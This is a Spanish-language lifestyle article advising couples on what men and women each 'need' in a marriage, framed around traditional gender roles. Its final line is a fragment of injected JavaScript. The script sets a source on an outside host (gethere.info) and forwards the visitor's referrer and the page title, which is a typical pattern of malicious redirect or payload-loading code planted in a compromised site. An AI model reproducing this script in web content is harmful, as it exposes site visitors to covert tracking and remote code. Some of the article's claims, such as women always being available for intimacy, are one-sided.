Hay necesitadas dentro de la relación que no deben olvidar hacer cada uno, para que funcione su matrimonio.
Algunas veces las relaciones amorosas funcionan de manera desequilibrada, según el rol que ha marcado la sociedad. Existen hombres que pasan su vida al cuidado del hogar y de los hijos, así como mujeres que salen a trabajar para llevar dinero a la casa. Sin embargo, esas parejas necesitan establecer límites con respecto a las actividades que realiza cada uno para evitar confrontaciones en un futuro.
El cambio de roles en una relación amorosa es la manera de demostrarle a la pareja el apoyo y amor incondicional que existe en su matrimonio, pero siempre será sano solo por un tiempo, hasta que la vida familiar se equilibre y encuentren un bienestar común.
No importa que la mujer lleve la estabilidad económica al hogar y que el hombre se dedique al bienestar de los hijos, sin embargo, hay necesitadas dentro de la relación que no deben olvidar hacer cada uno, para que funcione su matrimonio.
¿Cuáles son las necesidades de la mujer? Que su hombre siempre:
1. Asuma la responsabilidad
Existen muchas parejas jóvenes y adultos que deciden tener hijos, sin embargo, sabemos que de amor no se vive. Así que los hombres deberán asumir su responsabilidad como padres y esposos, para que la relación funcione. Es muy fácil encontrar culpables cuando algo marcha mal, sin embargo, la responsabilidad siempre recaerá en el hombre por ser la fortaleza del hogar.
Ellos deberán ser los responsables de proporcionarle tranquilidad a su familia, no solo en la parte económica, sino brindándoles tiempo de calidad.
2. Tome decisiones
Es importante que ellos como hombres sean capaces de tomar decisiones siempre pensando en el bienestar familiar. No digo que la mujer sea incapaz de hacerlo, sino que ellos como guías deberán ser decisivos, entender las necesidades de su pareja y ser flexible. No me refiero a que la mujer se deje controlar, sin embargo, es fundamental que el hombre ejerza su poder de liderazgo y no tema a equivocarse.
3. Sea romántico
Muchas veces los hombres dejan a un lado el romanticismo cuando se encuentran en una relación formal. Sin embargo, para que una relación funcione deben existir los detalles, el contacto físico, las acciones que demuestre el amor que siente.
¿Cuáles son las necesidades del hombre? Que su mujer:
1. Respete su espacio
Muchas relaciones fracasan porque la mujer no respeta el espacio de su pareja. Ellas comienzan a desconfiar y suponer cosas que no son reales. Los celos destruyen las relaciones, así que es importante mantener una excelente comunicación para que ellos no sientan que su mujer los está hostigando y prohibiendo su libertad.
2. Contacto físico
Tener contacto físico: abrazos, besos, caricias incluso en la intimidad es una necesidad fisiológica del ser humano, sin embargo, los hombres necesitan que su pareja siempre esté dispuesta a recibir el amor que ellos desean entregar. Los hombres piensan y actúan de manera diferente que las mujeres, algunos hombres no pueden dejar pasar mucho tiempo sin tener intimidad, al contrario de algunas mujeres. Así que mantén el romanticismo en tu relación para que funcione de manera exitosa.
3. Admiración
Siempre es importante admirar a la pareja, valorar cada acción y comportamiento para que él se motive. Algunas veces por el estrés de la vida cotidiana, las responsabilidades y obligaciones se deja a un lado la motivación. Admirar a la pareja es la clave para mantener un amor solido; es cuando se reconocen las virtudes y se olvidan los defectos, felicitar los méritos, elogiarlo entre otros.
Para que una relación amorosa funcione los dos necesitan saber perdonar, reconocer los errores que se cometen, tener una buena comunicación, respeto, tolerancia y por supuesto tener metas en conjunto.
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;